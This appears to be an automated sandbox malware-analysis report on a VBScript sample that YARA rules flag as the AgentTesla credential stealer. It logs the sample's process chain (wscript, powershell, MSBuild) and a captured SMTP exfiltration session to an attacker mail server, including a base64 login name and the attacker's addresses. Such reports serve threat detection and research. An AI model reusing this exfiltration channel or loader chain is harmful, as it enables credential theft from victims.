                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.749970104.26.12.2054438124C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-14 07:48:15 UTC155OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                    Host: api.ipify.org
                                    Connection: Keep-Alive
                                    2025-01-14 07:48:16 UTC424INHTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:48:15 GMT
                                    Content-Type: text/plain
                                    Content-Length: 12
                                    Connection: close
                                    Vary: Origin
                                    CF-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 901c05cfdb6f335a-EWR
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1807&rtt_var=698&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1545791&cwnd=232&unsent_bytes=0&cid=c43666db82ba9212&ts=283&x=0"
                                    2025-01-14 07:48:16 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                    Data Ascii: 8.46.123.189


                                    SMTP Packets

                                    TimestampSource PortDest PortSource IPDest IPCommands
                                    Jan 14, 2025 08:48:18.935760021 CET58749972162.254.34.31192.168.2.7220 server1.educt.shop ESMTP Postfix
                                    Jan 14, 2025 08:48:18.936139107 CET49972587192.168.2.7162.254.34.31EHLO 141700
                                    Jan 14, 2025 08:48:19.097470999 CET58749972162.254.34.31192.168.2.7250-server1.educt.shop
                                    250-PIPELINING
                                    250-SIZE 204800000
                                    250-ETRN
                                    250-STARTTLS
                                    250-AUTH PLAIN LOGIN
                                    250-AUTH=PLAIN LOGIN
                                    250-ENHANCEDSTATUSCODES
                                    250-8BITMIME
                                    250-DSN
                                    250 CHUNKING
                                    Jan 14, 2025 08:48:19.098611116 CET49972587192.168.2.7162.254.34.31AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A=
                                    Jan 14, 2025 08:48:19.263585091 CET58749972162.254.34.31192.168.2.7334 UGFzc3dvcmQ6
                                    Jan 14, 2025 08:48:19.429223061 CET58749972162.254.34.31192.168.2.7235 2.7.0 Authentication successful
                                    Jan 14, 2025 08:48:19.429466963 CET49972587192.168.2.7162.254.34.31MAIL FROM:<sendxsenses@vetrys.shop>
                                    Jan 14, 2025 08:48:19.590367079 CET58749972162.254.34.31192.168.2.7250 2.1.0 Ok
                                    Jan 14, 2025 08:48:19.592425108 CET49972587192.168.2.7162.254.34.31RCPT TO:<senses@vetrys.shop>
                                    Jan 14, 2025 08:48:19.755903959 CET58749972162.254.34.31192.168.2.7250 2.1.5 Ok
                                    Jan 14, 2025 08:48:19.756150007 CET49972587192.168.2.7162.254.34.31DATA
                                    Jan 14, 2025 08:48:19.917481899 CET58749972162.254.34.31192.168.2.7354 End data with <CR><LF>.<CR><LF>
                                    Jan 14, 2025 08:48:19.918253899 CET49972587192.168.2.7162.254.34.31.
                                    Jan 14, 2025 08:48:20.192673922 CET58749972162.254.34.31192.168.2.7250 2.0.0 Ok: queued as A614661091

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:02:47:08
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\009.vbe"
                                    Imagebase:0x7ff7e56f0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:02:47:11
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                                    Imagebase:0x7ff7e56f0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:04:11:00
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs"
                                    Imagebase:0x7ff7e56f0000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:11
                                    Start time:04:11:00
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                    Imagebase:0x7ff741d30000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:04:11:00
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:04:11:06
                                    Start date:14/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                    Imagebase:0xbf0000
                                    File size:262'432 bytes
                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2508931005.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2508931005.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:17
                                    Start time:04:11:07
                                    Start date:14/01/2025
                                    Path:C:\Windows\System32\wermgr.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0"
                                    Imagebase:0x7ff73e620000
                                    File size:229'728 bytes
                                    MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:8.6%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:86
                                      Total number of Limit Nodes:9
                                      execution_graph 38913 6aac5c8 38914 6aac5f3 38913->38914 38915 6aac6a2 38914->38915 38918 6aad49b 38914->38918 38923 6aad4a0 38914->38923 38919 6aad496 38918->38919 38920 6aad49e 38918->38920 38919->38915 38921 6aad4d5 38920->38921 38926 6aaa464 38920->38926 38921->38915 38924 6aaa464 CreateWindowExW 38923->38924 38925 6aad4d5 38924->38925 38925->38915 38927 6aad4f0 CreateWindowExW 38926->38927 38929 6aad614 38927->38929 38930 2df0848 38931 2df084e 38930->38931 38932 2df091b 38931->38932 38935 2df1382 38931->38935 38939 2df1390 38931->38939 38937 2df138b 38935->38937 38936 2df1488 38936->38931 38937->38936 38943 2df7ec0 38937->38943 38941 2df1396 38939->38941 38940 2df1488 38940->38931 38941->38940 38942 2df7ec0 GlobalMemoryStatusEx 38941->38942 38942->38941 38944 2df7eca 38943->38944 38945 2df7ee4 38944->38945 38948 695da08 38944->38948 38952 695d9fa 38944->38952 38945->38937 38950 695da1d 38948->38950 38949 695dc32 38949->38945 38950->38949 38951 695dc48 GlobalMemoryStatusEx 38950->38951 38951->38950 38953 695da1d 38952->38953 38954 695dc32 38953->38954 38955 695dc48 GlobalMemoryStatusEx 38953->38955 38954->38945 38955->38953 38956 2cfd030 38957 2cfd048 38956->38957 38958 2cfd0a2 38957->38958 38963 6aad6a8 38957->38963 38967 6aad69b 38957->38967 38971 6aaa48c 38957->38971 38980 6aae7ff 38957->38980 38964 6aad6ce 38963->38964 38965 6aaa48c CallWindowProcW 38964->38965 38966 6aad6ef 38965->38966 38966->38958 38968 6aad6a5 38967->38968 38969 6aaa48c CallWindowProcW 38968->38969 38970 6aad6ef 38969->38970 38970->38958 38972 6aaa497 38971->38972 38973 6aae869 38972->38973 38975 6aae859 38972->38975 38976 6aae867 38973->38976 39005 6aae46c 38973->39005 38989 6aae98b 38975->38989 38994 6aaea5c 38975->38994 39000 6aae990 38975->39000 38983 6aae835 38980->38983 38981 6aae869 38982 6aae46c CallWindowProcW 38981->38982 38985 6aae867 38981->38985 38982->38985 38983->38981 38984 6aae859 38983->38984 38986 6aae98b CallWindowProcW 38984->38986 38987 6aaea5c CallWindowProcW 38984->38987 38988 6aae990 CallWindowProcW 38984->38988 38986->38985 38987->38985 38988->38985 38991 6aae991 38989->38991 38990 6aaea30 38990->38976 39009 6aaea48 38991->39009 39012 6aaea43 38991->39012 38995 6aaea1a 38994->38995 38996 6aaea6a 38994->38996 38998 6aaea48 CallWindowProcW 38995->38998 38999 6aaea43 CallWindowProcW 38995->38999 38997 6aaea30 38997->38976 38998->38997 38999->38997 39002 6aae9a4 39000->39002 39001 6aaea30 39001->38976 39003 6aaea48 CallWindowProcW 39002->39003 39004 6aaea43 CallWindowProcW 39002->39004 39003->39001 39004->39001 39006 6aae477 39005->39006 39007 6aafcca CallWindowProcW 39006->39007 39008 6aafc79 39006->39008 39007->39008 39008->38976 39010 6aaea59 39009->39010 39016 6aafc0b 39009->39016 39010->38990 39013 6aaea48 39012->39013 39014 6aaea59 39013->39014 39015 6aafc0b CallWindowProcW 39013->39015 39014->38990 39015->39014 39017 6aae46c CallWindowProcW 39016->39017 39018 6aafc1a 39017->39018 39018->39010

                                      Executed Functions

                                      Function 06951018 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 126 6951018-6951039 127 695103b-695103e 126->127 128 6951064-6951067 127->128 129 6951040-695105f 127->129 130 695106d-695108c 128->130 131 6951808-695180a 128->131 129->128 139 69510a5-69510af 130->139 140 695108e-6951091 130->140 132 6951811-6951814 131->132 133 695180c 131->133 132->127 135 695181a-6951823 132->135 133->132 144 69510b5-69510c4 139->144 140->139 141 6951093-69510a3 140->141 141->144 252 69510c6 call 6951830 144->252 253 69510c6 call 6951838 144->253 145 69510cb-69510d0 146 69510d2-69510d8 145->146 147 69510dd-69513ba 145->147 146->135 168 69513c0-695146f 147->168 169 69517fa-6951807 147->169 178 6951471-6951496 168->178 179 6951498 168->179 181 69514a1-69514b4 178->181 179->181 183 69517e1-69517ed 181->183 184 69514ba-69514dc 181->184 183->168 185 69517f3 183->185 184->183 187 69514e2-69514ec 184->187 185->169 187->183 188 69514f2-69514fd 187->188 188->183 189 6951503-69515d9 188->189 201 69515e7-6951617 189->201 202 69515db-69515dd 189->202 206 6951625-6951631 201->206 207 6951619-695161b 201->207 202->201 208 6951691-6951695 206->208 209 6951633-6951637 206->209 207->206 210 69517d2-69517db 208->210 211 695169b-69516d7 208->211 209->208 212 6951639-6951663 209->212 210->183 210->189 222 69516e5-69516f3 211->222 223 69516d9-69516db 211->223 219 6951665-6951667 212->219 220 6951671-695168e 212->220 219->220 220->208 226 69516f5-6951700 222->226 227 695170a-6951715 222->227 223->222 226->227 230 6951702 226->230 231 6951717-695171d 227->231 232 695172d-695173e 227->232 230->227 233 6951721-6951723 231->233 234 695171f 231->234 236 6951756-6951762 232->236 237 6951740-6951746 232->237 233->232 234->232 241 6951764-695176a 236->241 242 695177a-69517cb 236->242 238 6951748 237->238 239 695174a-695174c 237->239 238->236 239->236 243 695176c 241->243 244 695176e-6951770 241->244 242->210 243->242 244->242 252->145 253->145
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q$$q$$q
                                      • API String ID: 0-2069967915
                                      • Opcode ID: 7393760c2294b1121b364809d0e66a0f92f5e2272c97b7ee10ac2135898c3c85
                                      • Instruction ID: e94efbb9382cb8d8824e3e608a66a227a9f57c666c327e09bbd3ebd9dc0521e9
                                      • Opcode Fuzzy Hash: 7393760c2294b1121b364809d0e66a0f92f5e2272c97b7ee10ac2135898c3c85
                                      • Instruction Fuzzy Hash: C6322D35E107198FDB54EF79D85069DF7B2FF89300F61C6A9E409AB214EB30A985CB90
                                      Function 02DFAA32 Relevance: 4.0, Strings: 1, Instructions: 2738COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3
                                      • API String ID: 0-1842515611
                                      • Opcode ID: a214af1686798620d2690102aa9a14b6a7b0ed79c9a33bc6ae0bf73ff5b231a9
                                      • Instruction ID: d5556d9ef325984e710a423a426e7eb73ba86ed04dff484e24d6c557734ad5f9
                                      • Opcode Fuzzy Hash: a214af1686798620d2690102aa9a14b6a7b0ed79c9a33bc6ae0bf73ff5b231a9
                                      • Instruction Fuzzy Hash: 1D53F831C10B1A8ADB51EF68C880699F7B1FF99300F15D79AE45877221FB70AAD5CB81
                                      Function 06955D50 Relevance: 3.0, Strings: 2, Instructions: 490COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1388 6955d50-6955d6e 1390 6955d70-6955d73 1388->1390 1391 6955d75-6955d83 1390->1391 1392 6955d8a-6955d8d 1390->1392 1400 6955d85 1391->1400 1401 6955df6-6955e0c 1391->1401 1393 6955d8f-6955da9 1392->1393 1394 6955dae-6955db1 1392->1394 1393->1394 1395 6955dd4-6955dd7 1394->1395 1396 6955db3-6955dcf 1394->1396 1398 6955de4-6955de6 1395->1398 1399 6955dd9-6955de3 1395->1399 1396->1395 1404 6955ded-6955df0 1398->1404 1405 6955de8 1398->1405 1400->1392 1409 6956027-695602a 1401->1409 1410 6955e12-6955e1b 1401->1410 1404->1390 1404->1401 1405->1404 1413 695602c-6956031 1409->1413 1411 6955e21-6955e3e 1410->1411 1412 6956032-695603c 1410->1412 1421 6956014-6956021 1411->1421 1422 6955e44-6955e6c 1411->1422 1416 695608d-695609e 1412->1416 1417 695603e-6956067 1412->1417 1425 6956083-6956087 1416->1425 1426 695609f 1416->1426 1419 6956069-695606c 1417->1419 1423 69562a1-69562a4 1419->1423 1424 6956072-6956081 1419->1424 1421->1409 1421->1410 1422->1421 1446 6955e72-6955e7b 1422->1446 1427 69562c7-69562ca 1423->1427 1428 69562a6-69562c2 1423->1428 1424->1425 1431 69560a0-69560e4 1424->1431 1425->1416 1426->1413 1426->1431 1429 6956375-6956377 1427->1429 1430 69562d0-69562dc 1427->1430 1428->1427 1434 695637e-6956381 1429->1434 1435 6956379 1429->1435 1437 69562e7-69562e9 1430->1437 1444 6956275-695628a 1431->1444 1445 69560ea-69560fb 1431->1445 1434->1419 1440 6956387-6956390 1434->1440 1435->1434 1442 6956301-6956305 1437->1442 1443 69562eb-69562f1 1437->1443 1450 6956307-6956311 1442->1450 1451 6956313 1442->1451 1447 69562f5-69562f7 1443->1447 1448 69562f3 1443->1448 1444->1423 1455 6956101-695611e 1445->1455 1456 6956260-695626f 1445->1456 1446->1412 1452 6955e81-6955e9d 1446->1452 1447->1442 1448->1442 1454 6956318-695631a 1450->1454 1451->1454 1460 6955ea3-6955ecd 1452->1460 1461 6956002-695600e 1452->1461 1457 695631c-695631f 1454->1457 1458 695632b-6956364 1454->1458 1455->1456 1469 6956124-695621a call 6954570 1455->1469 1456->1444 1456->1445 1457->1440 1458->1424 1477 695636a-6956374 1458->1477 1473 6955ed3-6955efb 1460->1473 1474 6955ff8-6955ffd 1460->1474 1461->1421 1461->1446 1524 695621c-6956226 1469->1524 1525 6956228 1469->1525 1473->1474 1483 6955f01-6955f2f 1473->1483 1474->1461 1483->1474 1488 6955f35-6955f3e 1483->1488 1488->1474 1489 6955f44-6955f76 1488->1489 1497 6955f81-6955f9d 1489->1497 1498 6955f78-6955f7c 1489->1498 1497->1461 1501 6955f9f-6955ff6 call 6954570 1497->1501 1498->1474 1500 6955f7e 1498->1500 1500->1497 1501->1461 1526 695622d-695622f 1524->1526 1525->1526 1526->1456 1527 6956231-6956236 1526->1527 1528 6956244 1527->1528 1529 6956238-6956242 1527->1529 1530 6956249-695624b 1528->1530 1529->1530 1530->1456 1531 695624d-6956259 1530->1531 1531->1456
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q
                                      • API String ID: 0-3126353813
                                      • Opcode ID: 1a1563c1d1b1590e534b92e73c08ce7815b41eea4777ea7fdd4799041df0c0b1
                                      • Instruction ID: 27894477414c78be72cbc9405758eeb9d80e5ce658bdf585a92b8ca4d5583f83
                                      • Opcode Fuzzy Hash: 1a1563c1d1b1590e534b92e73c08ce7815b41eea4777ea7fdd4799041df0c0b1
                                      • Instruction Fuzzy Hash: EC02AC30B002188FDB64DB79D850B6EBBA6FF84310F668569D806DB795DB31EC42CB90
                                      Function 0695E0D9 Relevance: 2.8, Strings: 2, Instructions: 337COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1533 695e0d9-695e0e6 1534 695e0ee-695e0fa 1533->1534 1535 695e0e8-695e0ed 1533->1535 1536 695e0fc-695e13b call 695d1b8 call 695d094 1534->1536 1537 695e15e-695e165 1534->1537 1535->1534 1546 695e166-695e1cd 1536->1546 1547 695e13d-695e148 1536->1547 1557 695e1d6-695e1e6 1546->1557 1558 695e1cf-695e1d1 1546->1558 1551 695e14f-695e156 1547->1551 1551->1537 1560 695e1ed-695e1fd 1557->1560 1561 695e1e8 1557->1561 1559 695e475-695e47c 1558->1559 1563 695e203-695e211 1560->1563 1564 695e45c-695e46a 1560->1564 1561->1559 1567 695e217 1563->1567 1568 695e47d-695e4f6 1563->1568 1564->1568 1569 695e46c-695e46e 1564->1569 1567->1568 1570 695e235-695e256 1567->1570 1571 695e2f4-695e315 1567->1571 1572 695e374-695e3b1 1567->1572 1573 695e3b6-695e3dc 1567->1573 1574 695e450-695e45a 1567->1574 1575 695e21e-695e230 1567->1575 1576 695e25b-695e27d 1567->1576 1577 695e31a-695e342 1567->1577 1578 695e347-695e36f 1567->1578 1579 695e3e1-695e40d 1567->1579 1580 695e282-695e2a3 1567->1580 1581 695e42c-695e44e 1567->1581 1582 695e40f-695e42a 1567->1582 1583 695e2ce-695e2ef 1567->1583 1584 695e2a8-695e2c9 1567->1584 1569->1559 1570->1559 1571->1559 1572->1559 1573->1559 1574->1559 1575->1559 1576->1559 1577->1559 1578->1559 1579->1559 1580->1559 1581->1559 1582->1559 1583->1559 1584->1559
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Xq$$q
                                      • API String ID: 0-855381642
                                      • Opcode ID: b1ab9be02f8a806be285a275fcf7b37e6b96310ab534b40b5bfa66a41036e6e3
                                      • Instruction ID: a0a9336b6f778926d08a6fbd521228fa2725b9d85d82b6805376e4084ec2c9d9
                                      • Opcode Fuzzy Hash: b1ab9be02f8a806be285a275fcf7b37e6b96310ab534b40b5bfa66a41036e6e3
                                      • Instruction Fuzzy Hash: C6B1AF70F042489FEB58EF79985477E7BA7ABC8300B16882DD446DB394CE399C0287D6
                                      Function 02DFDBE0 Relevance: 2.3, Instructions: 2280COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67cf3f3d7456d1dbd15190f94d1b486f7092e37c3c7a34cf4b3318cf97b91edc
                                      • Instruction ID: dcf40854c5fb3d0fb39db04d5157deda3bf04aec8a2bcb2761586eb0556365a2
                                      • Opcode Fuzzy Hash: 67cf3f3d7456d1dbd15190f94d1b486f7092e37c3c7a34cf4b3318cf97b91edc
                                      • Instruction Fuzzy Hash: A3332E31D107198EDB11EF68C8806ADF7B1FF99300F15C79AE558A7261EB70AAC5CB81
                                      Function 06953560 Relevance: 1.9, Strings: 1, Instructions: 608COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $
                                      • API String ID: 0-3993045852
                                      • Opcode ID: 72900506f036e3f04546f1abb13ba3146031ee4628e2123c4607027a9d94205a
                                      • Instruction ID: c76f2fecd09fab1020689f1482d3b70568f5a2528faa23bc6dd0b7efd16c5b73
                                      • Opcode Fuzzy Hash: 72900506f036e3f04546f1abb13ba3146031ee4628e2123c4607027a9d94205a
                                      • Instruction Fuzzy Hash: 9422F171E002188FDF64DBA9C4806AEBBF6EF85350F26846AD905EB745EB35DC41CB90
                                      Function 02DF3E88 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \VVm
                                      • API String ID: 0-390912563
                                      • Opcode ID: 7162f89d04c62a71c82e7d4c11e6eb25c8203d18af8dcf9d3392fe19e0f17597
                                      • Instruction ID: d4ed6c9fdd776e7d46f55fee78cd9a709bc454bc1760411c66c6dddcb79d4cb7
                                      • Opcode Fuzzy Hash: 7162f89d04c62a71c82e7d4c11e6eb25c8203d18af8dcf9d3392fe19e0f17597
                                      • Instruction Fuzzy Hash: 4A917E70E003499FDB64CFA9D88179EBBF2AF48304F168129E605A7394DB749C85CB85
                                      Function 069502F8 Relevance: 1.0, Instructions: 1020COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd6ba7ae51982df88d0809aa553b13e64ffbcb019f4a2f3eb3c5137c06326acc
                                      • Instruction ID: f1e5cdfaa3377d21c85243a29918c368cb448b3450efc89a7790eecd1c6bde9a
                                      • Opcode Fuzzy Hash: bd6ba7ae51982df88d0809aa553b13e64ffbcb019f4a2f3eb3c5137c06326acc
                                      • Instruction Fuzzy Hash: 3E924730E002048FDBA4DB68C594B6DBBF6FB85314F6684A9D809AB755DB31EC85CF81
                                      Function 069545C0 Relevance: .8, Instructions: 821COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22483b232f73bebada5fe481812c24d0380929419593549d1ef7a31163ca2265
                                      • Instruction ID: fc9e45ee248d274bb9b6b18cebe5d0a4242bd80fe2896784f4901cc9cb90a459
                                      • Opcode Fuzzy Hash: 22483b232f73bebada5fe481812c24d0380929419593549d1ef7a31163ca2265
                                      • Instruction Fuzzy Hash: C162BF34E002089FDBA4DB68D554BADBBF6EF84710F268469D806DB795DB31EC85CB80
                                      Function 0695A150 Relevance: .6, Instructions: 649COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f532d5dbf16953bf61f24176e4738755a4b936813231c7335c08e4c65345be1c
                                      • Instruction ID: d1baecae10a19010b7224b2000e5fffa2e498e7f2163dc3253047dbbcc493c2b
                                      • Opcode Fuzzy Hash: f532d5dbf16953bf61f24176e4738755a4b936813231c7335c08e4c65345be1c
                                      • Instruction Fuzzy Hash: 48329234F002088FDB64DF69D890BADBBB6EB88310F218629D905DB755DB31EC42CB95
                                      Function 069591F8 Relevance: .6, Instructions: 578COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2512012896.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6950000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dfb6627de5e32aea74f2d484f699effcd58a1b013f9ea557e1175da3b37c5087
                                      • Instruction ID: 5537e789a8460bdc90dfb972c83b283116ba756578cb17ba959e5e5561b26907
                                      • Opcode Fuzzy Hash: dfb6627de5e32aea74f2d484f699effcd58a1b013f9ea557e1175da3b37c5087
                                      • Instruction Fuzzy Hash: 36227230E00249CFFF64DB68D4907ADB7AAEB49310F668466E819DB755CB34DC81CB91
                                      Function 02DF4AA0 Relevance: .3, Instructions: 266COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2508811544.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2df0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd724ff5d4cf689fa30da3a87a05e2bb6d9cdbb53a3f8cfc5b9a81ed5eea43b1
                                      • Instruction ID: 1022c71075a6b6bf340b6dad14449ea25abf0d8eb4eb468c2ed846c452e0fb1b
                                      • Opcode Fuzzy Hash: bd724ff5d4cf689fa30da3a87a05e2bb6d9cdbb53a3f8cfc5b9a81ed5eea43b1
                                      • Instruction Fuzzy Hash: 13B18E71E003098FDB64CFA9D88179EBBF2AF88318F158129D615E7394EB749C81CB95
                                      Function 02DF4818 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                      Download Yara Rule

